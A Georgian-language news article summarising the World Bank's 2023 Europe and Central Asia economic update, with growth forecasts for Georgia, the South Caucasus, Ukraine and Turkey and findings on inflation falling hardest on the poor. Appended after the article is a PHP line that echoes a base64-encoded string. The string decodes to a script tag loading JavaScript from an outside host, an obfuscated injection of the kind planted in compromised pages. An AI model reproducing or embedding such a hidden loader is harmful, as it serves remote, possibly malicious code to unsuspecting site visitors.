celsiusi
ავერსი შნაიდერი

მსოფლიო ბანკმა დღეს გამოაქვეყნა ევროპისა და ცენტრალური აზიის რეგიონის ეკონომიკური მიმოხილვა, რომელშიც წარმოდგენილია რეგიონის და მასში შემავალი ქვეყნების, მათ შორის, საქართველოს ეკონომიკური ზრდის პროგნოზები.

ანგარიშის თანახმად, საქართველოში 2023 წელს მოსალოდნელია ეკონომიკური ზრდის შენელება 4.4 პროცენტამდე, თუმცა რეგიონულ საშუალო მაჩვენებელთან შედარებით, (2.4 პროცენტი რუსეთის ფედერაციისა და უკრაინის გამოკლებით) მაღალ დონეზე შენარჩუნება.

დოკუმენტის მიხედვით, ეკონომიკური ზრდა სამხრეთ კავკასიაში სავარაუდოდ მკვეთრად შესუსტდება 2022 წელს არსებული შვიდი პროცენტიდან სამ პროცენტამდე 2023 წელს, რადგან ზრდა შენელდება ძირითად სავაჭრო პარტნიორ ქვეყნებში, მათ შორის ევროკავშირში.

„დიდი მოცულობით ფულადი ნაკადების შემოდინებამ ხელი შეუწყო ლარის გამყარებას, რამაც შეაკავა ინფლაციური წნეხი და შეამცირა ვალის დონე. ინფლაცია სავარაუდოდ გააგრძელებს ეტაპობრივ კლებას 2023 წელს, თუმცა ზოგიერთ სასურსათო პროდუქტზე და საცხოვრებელ იჯარაზე ფასებით გამოწვეული წნეხის ზემოქმედება შეიძლება გაგრძელდეს“, – ნათქვამია მსოფლიო ბანკის ეკონომიკურ მიმოხილვაში.

მსოფლიო ბანკის მიერ დღეს დოკუმენტის თანახმად, წელს ევროპისა და ცენტრალური აზიის რეგიონში ეკონომიკური აქტივობა დაბალ ნიშნულზე შენარჩუნდება უკრაინაში რუსეთის შეჭრით გამოწვეული შედეგების, მაღალი ინფლაციის შენარჩუნებისა და მკაცრი ფინანსური პირობების გამო.

მათივე ცნობით, 2023 წელს სავარაუდოდ ადგილი ექნება რეგიონული გამოშვების ზრდას 1.4%-ით, რაც არსებითად უკეთესია ადრე მოსალოდნელ 0.1%-თან შედარებით.

„აღნიშნული დადებითი, თუმცა საკმაოდ შესუსტებული ეკონომიკური აქტივობა 2023 წელს ასახავს რუსეთის ეკონომიკის პროგნოზირებულზე ნაკლებ ვარდნას და უკრაინის პროგნოზის გაუმჯობესებას. რეგიონული ეკონომიკური ზრდის მაჩვენებელი 2024-25 წლებში, სავარაუდოდ, საშუალოდ 2.7%-მდე მოიმატებს, ინფლაციის კლების, ადგილობრივი მოთხოვნის აღდგენისა და საგარეო მდგომარეობის გაუმჯობესების პარალელურად.

ფასების მკვეთრი ზრდის გამო (კერძოდ, სურსათსა და ენერგორესურსებზე) 2022 წლის ბოლოს წლიურმა საშუალო ინფლაციამ 15.9%-ს მიაღწია ევროპისა და ცენტრალური აზიის ფორმირებადი ბაზრებისა და განვითარებადი ეკონომიკის მქონე ქვეყნებში (EMDEs), რაც რეკორდული ნიშნულია უკანასკნელი 20 წელზე მეტი ხნის განმავლობაში მსოფლიოს ყველა განვითარებად რეგიონში. ინფლაციის საშუალო მაჩვენებელი აღნიშნულ ქვეყნებში 4%-ზე ნაკლები იყო, ვიდრე 2021 წლიდან მატებას დაიწყებდა.

სამომავლო პერსპექტივა მეტად გაურკვეველია. ეკონომიკური ზრდა 2023 წელს შეიძლება, გაცილებით სუსტი იყოს თუ ადგილი ექნება უკრაინაში რუსეთის შეჭრით გამოწვეული ომის შემდგომ ესკალაციას, სურსათისა და ენერგორესურსების ფასების ზრდას, გლობალურად ან რეგიონში საპროცენტო განაკვეთების მატების დაჩქარებას, ან კაპიტალის ნაკადების მიმართულების მოულოდნელ ცვლილებას“, – ნათქვამია მსოფლიო ბანკის მიმოხილვაში.

როგორც მსოფლიო ბანკში აცხადებენ, საბანკო სფეროში მიმდინარე მოვლენებმა ზოგიერთ განვითარებულ ქვეყნაში შეიძლება გავლენა იქონიოს ეკონომიკურ ზრდაზე.

„პროგნოზის მიხედვით, უკრაინის ეკონომიკა წელს სავარაუდოდ 0.5%-ით გაიზრდება 2022 წლის 29.2%-იანი ვარდნის შემდეგ, რომელიც რუსეთის აგრესიას მოჰყვა. მიუხედავად ქვეყნისთვის ომით მიყენებული უდიდესი ეკონომიკური ზარალისა, უკრაინის შავი ზღვის პორტების ხელახალი გახსნა და მარცვლეულით ვაჭრობის აღდგენა, ისევე როგორც დონორების მხრიდან არსებითი მხარდაჭერა, ხელს უწყობს წლევანდელ ეკონომიკურ საქმიანობას.

მსოფლიო ბანკის ბოლოდროინდელი გამოთვლების თანახმად, უკრაინის რეკონსტრუქციისა და აღდგენის ღირებულება 411 მლრდ აშშ დოლარამდე გაიზარდა, რაც უკრაინის ომამდელ, 2021 წლის ეკონომიკის მოცულობას ორჯერ აღემატება“, – აღნიშნულია მსოფლიო ბანკის ეკონომიკური მიმოხილვის დოკუმენტში.

მსოფლიო ბანკში აღნიშნავენ, რომ თურქეთში 2023 წლის 6 თებერვალს ადგილი ჰქონდა ორ დამანგრეველ მიწისძვრას, რომლებმაც ქვეყანას 34.2 მლრდ აშშ დოლარის პირდაპირი ზიანი მიაყენა და რაც, მსოფლიო ბანკის მონაცემების თანახმად, ქვეყნის 2021 წლის მშპ-ის 4%-ია.

„ფაქტიური ხარჯები აღდგენისა და რეკონსტრუქციის სრული სპექტრის საჭიროებების დასაკმაყოფილებლად შეიძლება, პირდაპირ ზარალზე ორჯერ მეტი იყოს. უკანასკნელი მიწისძვრების ზემოქმედების გათვალისწინებით, 2023 წლისთვის პროგნოზირებული ეკონომიკური ზრდის მაჩვენებელი 3.2%-ია, რომელიც 2024-25 წლებში საშუალოდ 4.2%-მდე მოიმატებს შინამეურნეობებისთვის მთავრობის მიერ გაწეული დახმარებისა და რეკონსტრუქციის პროცესში განხორციელებული ინვესტიციების გათვალისწინებით“, – ნათქვამია მსოფლიო ბანკის ანგარიშში.

შენელებული ეკონომიკური ზრდისა და მაღალი ინფლაციის ფონზე, ანგარიშში სპეციალური თავი ეთმობა ფასების ზრდით გამოწვეულ კრიზისს, რომელიც რეგიონის მოსახლეობის ცხოვრების სტანდარტებზე მაღალი ინფლაციის ზემოქმედებას იკვლევს.

„ინფლაცია ფიტავს ადამიანების რეალურ შემოსავალს, მაღალი ინფლაცია კი გაცილებით უფრო მეტ გავლენას ახდენს უღარიბეს ფენაზე, ვიდრე მოსახლეობის უმდიდრეს ნაწილზე. მოწყვლადი ჯგუფების უკეთ დასაცავად, და ეკონომიკური ზრდის წასახალისებლად, ხელშემწყობი პოლიტიკა უნდა ითვალისწინებდეს ინფლაციის განსახვავებულ ზემოქმედებას შემოსავლების სხვადასხვა დონეებზე და გაცილებით უფრო ზუსტი ინდიკატორების გამოყენებას უღარიბეს მოსახლეობაზე მაღალი ფასებით გამოწვეული ფაქტიური დანახარჯების გავლენის შესაფასებლად“, – განაცხადა მსოფლიო ბანკის მთავარმა ეკონომისტმა ევროპისა და ცენტრალური აზიის რეგიონში ივაილო იზვორსკიმ.

მსოფლიო ბანკში აღნიშნავენ, რომ რეგიონის ქვეყნების მთავრობებმა ინფლაციას სოციალური დახმარებით და სუბსიდიებით უპასუხეს. უკანასკნელი მოიცავდა მორატორიუმს ენერგორესურსების ფასის ზრდაზე, საზოგადოებრივი ტრანსპორტის ტარიფების შემცირებას და ოჯახებისა და საწარმოებისთვის ელექტროენერგიის და ბუნებრივი აირის ფასზე ზედა ზღვარის დაწესებას. ამასთან, ანგარიშში წარმოდგენილი ანალიზი მიუთითებს საარსებო დანახარჯების კრიზისის უთანასწორო ტვირთზე. მასში აღნიშნულია, რომ ინფლაცია მოსახლეობის უღარიბესი 10 პროცენტისთვის 2 პროცენტული ერთეულით უფრო მაღალია, ვიდრე უმდიდრესი 10 პროცენტისთვის. ამ განსხვავებამ 5 პროცენტულ ერთეულს გადააჭარბა რეგიონის ზოგიერთ ქვეყანაში, მათ შორისაა მოლდოვა, მონტენეგრო და ჩრდილოეთ მაკედონია.

ანგარიშის თანახმად, პოლიტიკა, რომელიც არ ითვალისწინებს შინამეურნეობების წინაშე არსებული ინფლაციის განსხვავებულ მაჩვენებლებს, სავარაუდოდ არასაკმარისად ეხმარება მოწყვლად ჯგუფებს და შესაძლოა, არაადეკვატური და ნაკლებად ეფექტური აღმოჩნდეს. ანგარიშის რეკომენდაციაა სამომხმარებლო ფასის სტანდარტული ინდექსის (CPI) მიღმა მოხდეს ინფლაციის შესაფასებლად უღარიბესი მოსახლეობის საარსებო ფაქტიური დანახარჯების უფრო ზუსტი გამოთვლა. ეს აუცილებელია ეკონომიკური ზრდისა და სიღარიბის დაძლევისთვის უკეთესი პოლიტიკის შესამუშავებლად.

526
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");